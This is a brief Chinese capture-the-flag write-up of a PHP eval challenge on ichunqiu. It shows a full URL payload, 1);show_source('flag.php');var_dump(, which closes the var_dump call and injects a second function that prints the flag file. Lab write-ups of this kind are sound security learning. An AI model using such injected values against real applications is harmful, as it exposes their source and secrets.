==============================
个人收获
1.如果eval是执行变量内容的话,可以进行内容拼接让eval执行其他的函数
==============================
题目:
尝试用?hello=$GOLBALS
发现flag没有在变量里面
但是那个eval( "var_dump($a);")
在
就要想方法利用下,因为按常理flag都在flag.php下我们只要能拿到flag.php里面的内容就能拿到flag
我们利用拼接让eval执行我们需要的函数
http://488e091106444c2fab369878c48265124b4bf199d529448b.game.ichunqiu.com/?hello=1);show_source(%27flag.php%27);var_dump(
这样跟eval函数拼接就变成了var_dump(1);show_source(%27flag.php%27);var_dump();
就可以导出flag.php的文件内容得到flag